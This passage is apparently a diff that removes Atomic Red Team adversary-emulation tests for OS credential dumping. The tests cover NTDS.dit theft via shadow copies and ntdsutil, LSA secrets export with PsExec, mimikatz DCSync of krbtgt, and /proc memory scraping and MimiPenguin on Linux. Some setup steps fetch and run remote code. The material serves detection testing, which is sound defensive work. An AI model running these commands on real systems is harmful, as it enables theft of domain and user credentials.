| drive_letter | Drive letter to source VSC (including colon) | String | C:|
| symlink_path | symlink path | String | C:&#92;Temp&#92;vssstore|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
```
<br/>
atomics/T1003.003/T1003.003.yaml
-244
View File
@@ -1,244 +0,0 @@
attack_technique: T1003.003
display_name: "OS Credential Dumping: NTDS"
atomic_tests:
- name: Create Volume Shadow Copy with vssadmin
auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:'
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
executor:
command: |
vssadmin.exe create shadow /for=#{drive_letter}
name: command_prompt
elevation_required: true
- name: Copy NTDS.dit from Volume Shadow Copy
auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
default: '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1'
extract_path:
description: Path for extracted NTDS.dit
type: Path
default: C:\Windows\Temp
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
- description: |
Volume shadow copy must exist
prereq_command: |
if not exist #{vsc_name} (exit /b 1)
get_prereq_command: |
echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with vssadmin'" to fulfill this requirement
- description: |
Extract path must exist
prereq_command: |
if not exist #{extract_path} (exit /b 1)
get_prereq_command: |
mkdir #{extract_path}
executor:
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
cleanup_command: |
del "#{extract_path}\ntds.dit" >nul 2> nul
del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump Active Directory Database with NTDSUtil
auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
supported_platforms:
- windows
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\ntds_T1003
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
executor:
command: |
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
cleanup_command: |
rmdir /q /s #{output_folder} >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with WMI
auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
type: String
default: 'C:\'
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
executor:
command: |
wmic shadowcopy call create Volume=#{drive_letter}
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely with WMI
auto_generated_guid: d893459f-71f0-484d-9808-ec83b2b64226
description: |
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon and backslash)
type: String
default: 'C:\'
target_host:
description: IP Address / Hostname you want to target
type: String
default: localhost
dependencies:
- description: |
Target must be a reachable Domain Controller, and current context must be domain admin
prereq_command: |
wmic /node:"#{target_host}" shadowcopy list brief
get_prereq_command: |
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
executor:
command: |
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely (WMI) with esentutl
auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
description: |
This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
supported_platforms:
- windows
input_arguments:
source_path:
description: File to shadow copy
type: String
default: 'c:\windows\ntds\ntds.dit'
target_path:
description: Target path of the result file
type: String
default: 'c:\ntds.dit'
target_host:
description: IP Address / Hostname you want to target
type: String
default: localhost
dependencies:
- description: |
Target must be a reachable Domain Controller, and current context must be domain admin
prereq_command: |
wmic /node:"#{target_host}" shadowcopy list brief
get_prereq_command: |
echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
executor:
command: |
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with Powershell
auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:\'
executor:
command: |
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
name: powershell
elevation_required: true
- name: Create Symlink to Volume Shadow Copy
auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702
description: |
This test is intended to be run on a domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
supported_platforms:
- windows
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: 'C:'
symlink_path:
description: symlink path
type: String
default: 'C:\Temp\vssstore'
executor:
command: |
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
name: command_prompt
elevation_required: true
atomics/T1003.004/T1003.004.md
-66
View File
@@ -1,66 +0,0 @@
# T1003.004 - OS Credential Dumping: LSA Secrets
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
<blockquote>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dumping LSA Secrets](#atomic-test-1---dumping-lsa-secrets)
<br/>
## Atomic Test #1 - Dumping LSA Secrets
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
**Supported Platforms:** Windows
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder&#92;T1003.004&#92;bin&#92;PsExec.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
```
#### Cleanup Commands:
```cmd
del %temp%\secrets >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
```
<br/>
atomics/T1003.004/T1003.004.yaml
-31
View File
@@ -1,31 +0,0 @@
attack_technique: T1003.004
display_name: "OS Credential Dumping: LSA Secrets"
atomic_tests:
- name: Dumping LSA Secrets
auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f
description: |
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
supported_platforms:
- windows
input_arguments:
psexec_exe:
description: Path to PsExec executable
type: Path
default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
dependency_executor_name: powershell
dependencies:
- description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
prereq_command: 'if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}'
get_prereq_command: |-
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
executor:
command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y'
cleanup_command: del %temp%\secrets >nul 2> nul
name: command_prompt
elevation_required: true
atomics/T1003.005/T1003.005.md
-47
View File
@@ -1,47 +0,0 @@
# T1003.005 - OS Credential Dumping: Cached Domain Credentials
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
<blockquote>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Cached Credential Dump via Cmdkey](#atomic-test-1---cached-credential-dump-via-cmdkey)
<br/>
## Atomic Test #1 - Cached Credential Dump via Cmdkey
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
Credentials listed with Cmdkey only pertain to the current user
Passwords will not be displayed once they are stored
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
**Supported Platforms:** Windows
**auto_generated_guid:** 56506854-89d6-46a3-9804-b7fde90791f9
#### Attack Commands: Run with `command_prompt`!
```cmd
cmdkey /list
```
<br/>
atomics/T1003.005/T1003.005.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003.005
display_name: 'OS Credential Dumping: Cached Domain Credentials'
atomic_tests:
- name: Cached Credential Dump via Cmdkey
auto_generated_guid: 56506854-89d6-46a3-9804-b7fde90791f9
description: |
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
Credentials listed with Cmdkey only pertain to the current user
Passwords will not be displayed once they are stored
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
cmdkey /list
atomics/T1003.006/T1003.006.md
-122
View File
@@ -1,122 +0,0 @@
# T1003.006 - OS Credential Dumping: DCSync
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
<blockquote>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</blockquote>
## Atomic Tests
- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
- [Atomic Test #2 - Run DSInternals Get-ADReplAccount](#atomic-test-2---run-dsinternals-get-adreplaccount)
<br/>
## Atomic Test #1 - DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
**Supported Platforms:** Windows
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted Active Directory domain | String | %userdnsdomain%|
| user | Targeted user | String | krbtgt|
| mimikatz_path | Mimikatz windows executable | Path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
<br/>
<br/>
## Atomic Test #2 - Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
**Supported Platforms:** Windows
**auto_generated_guid:** a0bced08-3fc5-4d8b-93b7-e8344739376e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADReplAccount -All -Server #{logonserver}
```
#### Dependencies: Run with `powershell`!
##### Description: DSInternals must be installed
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name DSInternals -Scope CurrentUser -Force
```
<br/>
atomics/T1003.006/T1003.006.yaml
-75
View File
@@ -1,75 +0,0 @@
attack_technique: T1003.006
display_name: "OS Credential Dumping: DCSync"
atomic_tests:
- name: DCSync (Active Directory)
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
description: |
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
supported_platforms:
- windows
input_arguments:
domain:
description: Targeted Active Directory domain
type: String
default: '%userdnsdomain%'
user:
description: Targeted user
type: String
default: krbtgt
mimikatz_path:
description: Mimikatz windows executable
type: Path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
executor:
name: command_prompt
elevation_required: false
command: |
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
- name: Run DSInternals Get-ADReplAccount
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
description: |
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
supported_platforms:
- windows
input_arguments:
logonserver:
description: ComputerName argument default %logonserver%
type: String
default: $ENV:logonserver.TrimStart("\")
dependency_executor_name: powershell
dependencies:
- description: |
DSInternals must be installed
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name DSInternals -Scope CurrentUser -Force
executor:
command: |
Get-ADReplAccount -All -Server #{logonserver}
name: powershell
elevation_required: False
atomics/T1003.007/T1003.007.md
-227
View File
@@ -1,227 +0,0 @@
# T1003.007 - OS Credential Dumping: Proc Filesystem
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin)
<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
<br/>
<br/>
## Atomic Test #2 - Dump individual process memory with Python (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
##### Description: Requires Python
##### Check Prereq Commands:
```sh
(which python || which python3 || which python2)
```
##### Get Prereq Commands:
```sh
echo "Python 2.7+ or 3.4+ must be installed"
```
<br/>
<br/>
## Atomic Test #3 - Capture Passwords with MimiPenguin
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
**Supported Platforms:** Linux
**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
```
#### Cleanup Commands:
```bash
rm -f #{output_file} > /dev/null
```
#### Dependencies: Run with `sh`!
##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
##### Check Prereq Commands:
```sh
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
```
##### Description: Strings must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install binutils
```
##### Description: Python2 must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install python2
```
##### Description: Libc-bin must be installed
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo apt-get -y install libc-bin
```
<br/>
atomics/T1003.007/T1003.007.yaml
-160
View File
@@ -1,160 +0,0 @@
---
attack_technique: T1003.007
display_name: 'OS Credential Dumping: Proc Filesystem'
atomic_tests:
- name: Dump individual process memory with sh (Local)
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
python_script:
description: Path to script generating the target process
type: Path
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
